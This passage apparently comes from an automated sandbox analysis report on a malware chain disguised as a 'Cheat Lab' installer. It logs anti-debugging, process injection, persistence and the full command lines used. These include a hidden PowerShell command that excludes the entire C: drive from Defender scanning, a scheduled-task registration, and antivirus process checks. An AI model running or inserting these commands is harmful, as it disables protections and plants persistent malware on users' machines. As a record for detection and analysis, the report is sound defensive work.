                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep count: 6205 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 1751 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe TID: 7788 Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe TID: 6024 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424 Thread sleep count: 2816 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424 Thread sleep time: -281600000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424 Thread sleep count: 7181 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424 Thread sleep time: -718100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904 Thread sleep count: 3237 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904 Thread sleep time: -323700000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904 Thread sleep count: 6761 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904 Thread sleep time: -676100000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe Last function: Thread delayed
                        Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BADC412C FindFirstFileExW,11_2_00007FF7BADC412C
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_00404399 FindFirstFileW,FindClose,SetLastError,CompareFileTime,16_2_00404399
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_00403C8F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,16_2_00403C8F
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_00403DA4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,16_2_00403DA4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0095E1AC GetFileAttributesW,FindFirstFileW,FindClose,29_2_0095E1AC
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0095D65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D65B
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0095D98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D98E
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0096A29A FindFirstFileW,Sleep,FindNextFileW,FindClose,29_2_0096A29A
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00966406 FindFirstFileW,FindNextFileW,FindClose,29_2_00966406
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_009670FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,29_2_009670FE
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0096705D FindFirstFileW,FindClose,29_2_0096705D
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00969DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969DB1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00969F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969F0C
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_008F4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_008F4E68
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe Thread delayed: delay time: 100000
                        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pontiac
                        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns
                        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: Carbon.pif, 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                        Source: Carbon.pif, 0000001D.00000003.2960356253.000000000388D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_29-105172
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0096F229 BlockInput,29_2_0096F229
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BADB6E5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7BADB6E5C
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_008F4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_008F4E68
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041BDB6 mov eax, dword ptr fs:[00000030h] 16_2_0041BDB6
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041DF79 mov eax, dword ptr fs:[00000030h] 16_2_0041DF79
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041DF34 mov eax, dword ptr fs:[00000030h] 16_2_0041DF34
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00915038 mov eax, dword ptr fs:[00000030h] 29_2_00915038
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BADC8D74 GetProcessHeap,11_2_00007FF7BADC8D74
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BAD8BF4C SetUnhandledExceptionFilter,_invalid_parameter_noinfo,11_2_00007FF7BAD8BF4C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BAD8BB34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7BAD8BB34
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BADB6E5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7BADB6E5C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BAD8C4B4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7BAD8C4B4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BAD8C698 SetUnhandledExceptionFilter,11_2_00007FF7BAD8C698
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0041A4A5
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041CD41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0041CD41
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041A60A SetUnhandledExceptionFilter,16_2_0041A60A
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0041A7C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0041A7C0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_009228E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_009228E2
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00910B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00910B8F
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00910D25 SetUnhandledExceptionFilter,29_2_00910D25
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00910F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00910F71
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Memory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe base: 1390000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Memory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe base: 1390000
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Memory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe base: 11ED000
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_009518E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,29_2_009518E3
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_004025A9 ShowWindow,BringWindowToTop,ShellExecuteExW,WaitForSingleObject,CloseHandle,16_2_004025A9
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0090F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,29_2_0090F64C
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0095E996 mouse_event,29_2_0095E996
                        Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                        Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 28945
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Entered + Conferences 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif 28945\Carbon.pif 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss87c.ps1" -propfile "c:\users\user\appdata\local\temp\msi86a.txt" -scriptfile "c:\users\user\appdata\local\temp\scr86b.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr86c.txt" -propsep " :<->: " -testprefix "_testvalue."
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "register-scheduledtask -taskname 'y29ubmvjddc0mq==' -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\discord\settings\connect.exe') -trigger (new-scheduledtasktrigger -at (get-date).addminutes(1) -once) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -startwhenavailable) -force"
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00951244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,29_2_00951244
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: 16_2_0040493F AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_0040493F
                        Source: Carbon.pif Binary or memory string: Shell_TrayWnd
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: 11_2_00007FF7BADBD3E0 cpuid 11_2_00007FF7BADBD3E0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: GetLocaleInfoW,11_2_00007FF7BADC89C8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF7BADC8918
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF7BADC8AF4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,11_2_00007FF7BADC80C0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: try_get_function,GetLocaleInfoW,11_2_00007FF7BADB7D50
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: EnumSystemLocalesW,11_2_00007FF7BADC840C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: EnumSystemLocalesW,11_2_00007FF7BADC84DC
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: GetLocaleInfoW,11_2_00007FF7BADC87C0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: EnumSystemLocalesW,11_2_00007FF7BADB7718
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF7BADC8574
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,GetEnvironmentVariableW,GetLastError,lstrcmpiW,SetLastError,lstrlenA,GetLocaleInfoW,MultiByteToWideChar,16_2_004041E0
                        Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
